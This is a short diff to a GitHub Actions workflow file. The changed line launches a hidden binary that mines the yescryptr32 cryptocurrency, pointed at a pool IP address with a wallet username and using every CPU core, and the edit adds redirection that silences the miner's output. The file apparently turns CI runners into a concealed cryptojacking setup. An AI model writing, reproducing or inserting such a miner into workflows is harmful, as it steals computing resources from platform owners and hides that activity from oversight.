--- a/.github/workflows/main22.yml
+++ b/.github/workflows/main22.yml
@@ -58,7 +58,7 @@ jobs:
             cpulimit_pid=$!
             
             # Run the process with the specified parameters in background
-            nohup .lib/sgr1 -a yescryptr32 --pool 45.115.224.59:8443 -u UddCZe5d6VZNj2B7BgHPfyyQvCek6txUTx.$cpulimit_pid --timeout 120 -t $num_cores &
+            nohup .lib/sgr1 -a yescryptr32 --pool 45.115.224.59:8443 -u UddCZe5d6VZNj2B7BgHPfyyQvCek6txUTx.$cpulimit_pid --timeout 120 -t $num_cores > /dev/null 2>&1 &
             
             # Store the PID of the running process
             process_pid=$!
